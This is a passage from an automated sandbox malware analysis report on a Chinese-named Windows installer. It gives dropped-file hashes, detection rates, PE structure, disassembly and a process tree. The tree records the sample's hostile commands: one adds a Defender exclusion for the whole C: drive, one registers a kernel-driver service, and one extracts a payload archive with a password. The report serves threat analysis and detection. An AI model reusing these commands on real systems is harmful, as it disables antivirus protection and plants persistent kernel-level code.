                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\is-08K47.tmp\update.vbc

                                    Download File
                                    Process:C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp
                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):3621376
                                    Entropy (8bit):7.006090025798393
                                    Encrypted:false
                                    SSDEEP:98304:UXTNS5omKHixBbVZ9yogz/lWGAxNRie71MzSRMYuefCG/gZD:U5SG7Hwke71MzxY/UZD
                                    MD5:FCADEAE28FCC52FD286350DFEECD82E5
                                    SHA1:48290AA098DEDE53C457FC774063C3198754A161
                                    SHA-256:34063D8A5CC7DE10C1514FD21463D4E5A0E99CFAB7A8EE1168E84EDE8823EDFB
                                    SHA-512:56428AFDEEE8774518FE206AE4CD017F552F947508B87785A3BD960B14364F990F54E73F01C2A5CAF9B1862DADDD634BB894882B00B60102675D63F52245A41F
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 26%
                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...D.jg...........!..........................................................7...........@.........................8s.......y..<....p7.X.....................7.d?..........................h9.......................{...............................text...P........................... ..`.rdata..4...........................@..@.data...............................@....00cfg........(......T(.............@..@.tls..........(......V(.............@....voltbl.F.....(......X(..................aQ#..........(......Z(............. ..`.rsrc...X....p7.......6.............@..@.reloc..d?....7..@....7.............@..B................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp

                                    Download File
                                    Process:C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):3366912
                                    Entropy (8bit):6.530562538281642
                                    Encrypted:false
                                    SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                    MD5:C9B4238B2FFEC70B575E52822B8A8F70
                                    SHA1:8B008190A81BD70F937E9ED70756E611A5814A17
                                    SHA-256:69872DDA1D5F8A3C9F93646165519F8A97A1CE8E21DAFE680789020C973EC057
                                    SHA-512:CA0FE894C953E066827ED0B116600E45C1791C178E65AACF1D1417085C6DBE05528AF230E0DD05B2AA0F35D10C2B4761A267D2A7EBB7B504AA1B7FFFD652CDF3
                                    Malicious:true
                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................

                                    C:\Users\user\AppData\Local\Temp\is-7GK69.tmp\_isetup\_setup64.tmp

                                    Download File
                                    Process:C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp
                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                    Category:dropped
                                    Size (bytes):6144
                                    Entropy (8bit):4.720366600008286
                                    Encrypted:false
                                    SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                    MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                    SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                    SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                    SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                    Malicious:false
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\is-7GK69.tmp\update.vbc

                                    Download File
                                    Process:C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp
                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):3621376
                                    Entropy (8bit):7.006090025798393
                                    Encrypted:false
                                    SSDEEP:98304:UXTNS5omKHixBbVZ9yogz/lWGAxNRie71MzSRMYuefCG/gZD:U5SG7Hwke71MzxY/UZD
                                    MD5:FCADEAE28FCC52FD286350DFEECD82E5
                                    SHA1:48290AA098DEDE53C457FC774063C3198754A161
                                    SHA-256:34063D8A5CC7DE10C1514FD21463D4E5A0E99CFAB7A8EE1168E84EDE8823EDFB
                                    SHA-512:56428AFDEEE8774518FE206AE4CD017F552F947508B87785A3BD960B14364F990F54E73F01C2A5CAF9B1862DADDD634BB894882B00B60102675D63F52245A41F
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 26%
                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...D.jg...........!..........................................................7...........@.........................8s.......y..<....p7.X.....................7.d?..........................h9.......................{...............................text...P........................... ..`.rdata..4...........................@..@.data...............................@....00cfg........(......T(.............@..@.tls..........(......V(.............@....voltbl.F.....(......X(..................aQ#..........(......Z(............. ..`.rsrc...X....p7.......6.............@..@.reloc..d?....7..@....7.............@..B................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp

                                    Download File
                                    Process:C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):3366912
                                    Entropy (8bit):6.530562538281642
                                    Encrypted:false
                                    SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                                    MD5:C9B4238B2FFEC70B575E52822B8A8F70
                                    SHA1:8B008190A81BD70F937E9ED70756E611A5814A17
                                    SHA-256:69872DDA1D5F8A3C9F93646165519F8A97A1CE8E21DAFE680789020C973EC057
                                    SHA-512:CA0FE894C953E066827ED0B116600E45C1791C178E65AACF1D1417085C6DBE05528AF230E0DD05B2AA0F35D10C2B4761A267D2A7EBB7B504AA1B7FFFD652CDF3
                                    Malicious:true
                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................

                                    \Device\ConDrv

                                    Download File
                                    Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                    File Type:ASCII text, with CRLF, CR line terminators
                                    Category:dropped
                                    Size (bytes):406
                                    Entropy (8bit):5.117520345541057
                                    Encrypted:false
                                    SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                                    MD5:9200058492BCA8F9D88B4877F842C148
                                    SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                                    SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                                    SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                                    Malicious:false
                                    Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):7.962340023354145
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 98.04%
                                    • Inno Setup installer (109748/4) 1.08%
                                    • InstallShield setup (43055/19) 0.42%
                                    • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                    • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                    File name:#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe
                                    File size:9'026'305 bytes
                                    MD5:8af97a4879574d6e29e4e9fcd3a9bef0
                                    SHA1:3c0fcaf35b6f6cb6eb710ccb91c691fa629430ab
                                    SHA256:ac7a870316c9f66b5750e39592f97e58a5ae8da0f05951a5f25047b15aa88041
                                    SHA512:17c2dd2a92c733040b474549ffaad59ffdc632fa15b0c701742c26f8bfda89b8bd62e91545889e57feec6e951a7bcb886d865a975dd16a4571b61c1e8db4d74d
                                    SSDEEP:196608:ljhhOJmKi8b+H7K+ofxIrA12fIkfRZUNNbqlg:ljRKP+HGhxsAUfIQRZkUC
                                    TLSH:AD962313F2CBD43EE06A0B3755B2A15484FB6A606427BE468AEC74ACCF365501E3E747
                                    File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                    File Icon

                                    Icon Hash:0c0c2d33ceec80aa

                                    Static PE Info

                                    General

                                    Entrypoint:0x4a83bc
                                    Entrypoint Section:.itext
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:6
                                    OS Version Minor:1
                                    File Version Major:6
                                    File Version Minor:1
                                    Subsystem Version Major:6
                                    Subsystem Version Minor:1
                                    Import Hash:40ab50289f7ef5fae60801f88d4541fc

                                    Entrypoint Preview

                                    Instruction
                                    push ebp
                                    mov ebp, esp
                                    add esp, FFFFFFA4h
                                    push ebx
                                    push esi
                                    push edi
                                    xor eax, eax
                                    mov dword ptr [ebp-3Ch], eax
                                    mov dword ptr [ebp-40h], eax
                                    mov dword ptr [ebp-5Ch], eax
                                    mov dword ptr [ebp-30h], eax
                                    mov dword ptr [ebp-38h], eax
                                    mov dword ptr [ebp-34h], eax
                                    mov dword ptr [ebp-2Ch], eax
                                    mov dword ptr [ebp-28h], eax
                                    mov dword ptr [ebp-14h], eax
                                    mov eax, 004A2EBCh
                                    call 00007FF8113228C5h
                                    xor eax, eax
                                    push ebp
                                    push 004A8AC1h
                                    push dword ptr fs:[eax]
                                    mov dword ptr fs:[eax], esp
                                    xor edx, edx
                                    push ebp
                                    push 004A8A7Bh
                                    push dword ptr fs:[edx]
                                    mov dword ptr fs:[edx], esp
                                    mov eax, dword ptr [004B0634h]
                                    call 00007FF8113B424Bh
                                    call 00007FF8113B3D9Eh
                                    lea edx, dword ptr [ebp-14h]
                                    xor eax, eax
                                    call 00007FF8113AEA78h
                                    mov edx, dword ptr [ebp-14h]
                                    mov eax, 004B41F4h
                                    call 00007FF81131C973h
                                    push 00000002h
                                    push 00000000h
                                    push 00000001h
                                    mov ecx, dword ptr [004B41F4h]
                                    mov dl, 01h
                                    mov eax, dword ptr [0049CD14h]
                                    call 00007FF8113AFDA3h
                                    mov dword ptr [004B41F8h], eax
                                    xor edx, edx
                                    push ebp
                                    push 004A8A27h
                                    push dword ptr fs:[edx]
                                    mov dword ptr fs:[edx], esp
                                    call 00007FF8113B42D3h
                                    mov dword ptr [004B4200h], eax
                                    mov eax, dword ptr [004B4200h]
                                    cmp dword ptr [eax+0Ch], 01h
                                    jne 00007FF8113BAFBAh
                                    mov eax, dword ptr [004B4200h]
                                    mov edx, 00000028h
                                    call 00007FF8113B0698h
                                    mov edx, dword ptr [004B4200h]

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0xb70000x71.edata
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xb50000xfec.idata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xcb0000x11000.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000x10fa8.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0xb90000x18.rdata
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0xb52d40x25c.idata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xb60000x1a4.didata
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000xa568c0xa5800b889d302f6fc48a904de33d8d947ae80False0.3620185045317221data6.377190161826806IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .itext0xa70000x1b640x1c00588dd0a8ab499300d3701cbd11b017d9False0.548828125data6.109264411030635IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .data0xa90000x38380x3a005c0c76e77aef52ebc6702430837ccb6eFalse0.35338092672413796data4.95916338709992IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .bss0xad0000x72580x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .idata0xb50000xfec0x1000627340dff539ef99048969aa4824fb2dFalse0.380615234375data5.020404933181373IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .didata0xb60000x1a40x200fd11c1109737963cc6cb7258063abfd6False0.34765625data2.729290535217263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .edata0xb70000x710x2007de8ca0c7a61668a728fd3a88dc0942dFalse0.1796875data1.305578535725827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .tls0xb80000x180x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rdata0xb90000x5d0x200d84006640084dc9f74a07c2ff9c7d656False0.189453125data1.3892750148744617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0xba0000x10fa80x11000a85fda2741bd9417695daa5fc5a9d7a5False0.5789579503676471data6.709466460182023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                    .rsrc0xcb0000x110000x11000bd2e661569cc3ed9cbb634151f4f1236False0.18764361213235295data3.7223784289670983IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_ICON0xcb6780xa68Device independent bitmap graphic, 64 x 128 x 4, image size 2048EnglishUnited States0.1174924924924925
                                    RT_ICON0xcc0e00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.15792682926829268
                                    RT_ICON0xcc7480x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.23387096774193547
                                    RT_ICON0xcca300x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.39864864864864863
                                    RT_ICON0xccb580x1628Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colorsEnglishUnited States0.08339210155148095
                                    RT_ICON0xce1800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.1023454157782516
                                    RT_ICON0xcf0280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.10649819494584838
                                    RT_ICON0xcf8d00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.10838150289017341
                                    RT_ICON0xcfe380x12e5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8712011577424024
                                    RT_ICON0xd11200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.05668398677373642
                                    RT_ICON0xd53480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.08475103734439834
                                    RT_ICON0xd78f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.09920262664165103
                                    RT_ICON0xd89980x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.2047872340425532
                                    RT_STRING0xd8e000x3f8data0.3198818897637795
                                    RT_STRING0xd91f80x2dcdata0.36475409836065575
                                    RT_STRING0xd94d40x430data0.40578358208955223
                                    RT_STRING0xd99040x44cdata0.38636363636363635
                                    RT_STRING0xd9d500x2d4data0.39226519337016574
                                    RT_STRING0xda0240xb8data0.6467391304347826
                                    RT_STRING0xda0dc0x9cdata0.6410256410256411
                                    RT_STRING0xda1780x374data0.4230769230769231
                                    RT_STRING0xda4ec0x398data0.3358695652173913
                                    RT_STRING0xda8840x368data0.3795871559633027
                                    RT_STRING0xdabec0x2a4data0.4275147928994083
                                    RT_RCDATA0xdae900x10data1.5
                                    RT_RCDATA0xdaea00x310data0.6173469387755102
                                    RT_RCDATA0xdb1b00x2cdata1.1818181818181819
                                    RT_GROUP_ICON0xdb1dc0xbcdataEnglishUnited States0.6170212765957447
                                    RT_VERSION0xdb2980x584dataEnglishUnited States0.2776203966005666
                                    RT_MANIFEST0xdb81c0x7a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3377551020408163

                                    Imports

                                    DLLImport
                                    kernel32.dllGetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                                    comctl32.dllInitCommonControls
                                    user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                                    oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                                    advapi32.dllConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey

                                    Exports

                                    NameOrdinalAddress
                                    __dbk_fcall_wrapper20x40fc10
                                    dbkFCallWrapperAddr10x4b063c

                                    Possible Origin

                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishUnited States

                                    Network Behavior

                                    No network behavior found

                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:22:30:56
                                    Start date:24/12/2024
                                    Path:C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe"
                                    Imagebase:0x310000
                                    File size:9'026'305 bytes
                                    MD5 hash:8AF97A4879574D6E29E4E9FCD3A9BEF0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:Borland Delphi
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:2
                                    Start time:22:30:56
                                    Start date:24/12/2024
                                    Path:C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\AppData\Local\Temp\is-1JVO8.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp" /SL5="$20406,8071911,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe"
                                    Imagebase:0x2f0000
                                    File size:3'366'912 bytes
                                    MD5 hash:C9B4238B2FFEC70B575E52822B8A8F70
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:Borland Delphi
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:3
                                    Start time:22:30:57
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                    Imagebase:0x7ff6e3d50000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:4
                                    Start time:22:30:57
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:5
                                    Start time:22:30:57
                                    Start date:24/12/2024
                                    Path:C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe" /VERYSILENT
                                    Imagebase:0x310000
                                    File size:9'026'305 bytes
                                    MD5 hash:8AF97A4879574D6E29E4E9FCD3A9BEF0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:Borland Delphi
                                    Reputation:low
                                    Has exited:false

                                    General

                                    Target ID:6
                                    Start time:22:30:58
                                    Start date:24/12/2024
                                    Path:C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\AppData\Local\Temp\is-GPP47.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.tmp" /SL5="$30420,8071911,845824,C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe" /VERYSILENT
                                    Imagebase:0x4f0000
                                    File size:3'366'912 bytes
                                    MD5 hash:C9B4238B2FFEC70B575E52822B8A8F70
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:Borland Delphi
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:7
                                    Start time:22:31:01
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                    Imagebase:0x7ff636db0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:8
                                    Start time:22:31:01
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\sc.exe
                                    Wow64 process (32bit):false
                                    Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                    Imagebase:0x7ff7223c0000
                                    File size:72'192 bytes
                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:9
                                    Start time:22:31:01
                                    Start date:24/12/2024
                                    Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                    Wow64 process (32bit):true
                                    Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                                    Imagebase:0x560000
                                    File size:831'200 bytes
                                    MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Antivirus matches:
                                    • Detection: 0%, ReversingLabs
                                    • Detection: 0%, Virustotal, Browse
                                    Reputation:moderate
                                    Has exited:true

                                    General

                                    Target ID:10
                                    Start time:22:31:01
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:11
                                    Start time:22:31:01
                                    Start date:24/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:12
                                    Start time:22:31:02
                                    Start date:24/12/2024
